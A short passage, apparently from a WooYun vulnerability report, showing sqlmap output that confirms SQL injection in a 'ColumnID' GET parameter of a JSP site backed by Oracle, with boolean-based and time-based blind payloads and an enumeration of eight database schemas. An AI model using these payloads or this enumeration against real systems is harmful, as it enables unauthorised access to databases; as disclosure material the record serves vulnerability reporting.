WooYun.org

---
Place: GET
Parameter: ColumnID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ColumnID=53 AND 9605=9605
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: ColumnID=53 AND 6402=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T
2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
---
[21:50:45] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[21:50:45] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[21:50:45] [INFO] fetching database (schema) names
[21:50:45] [INFO] fetching number of databases
[21:50:45] [INFO] resumed: 8
[21:50:45] [INFO] resumed: CTXSYS
[21:50:45] [INFO] resumed: EXFSYS
[21:50:45] [INFO] resumed: FTYWEB
[21:50:45] [INFO] resumed: MDSYS
[21:50:45] [INFO] resumed: OLAPSYS
[21:50:45] [INFO] resumed: SYS
[21:50:45] [INFO] resumed: SYSTEM
[21:50:45] [INFO] resumed: WMSYS
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] FTYWEB
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WMSYS

[22:02:19] [INFO] heuristics detected web page charset 'GB2312'
157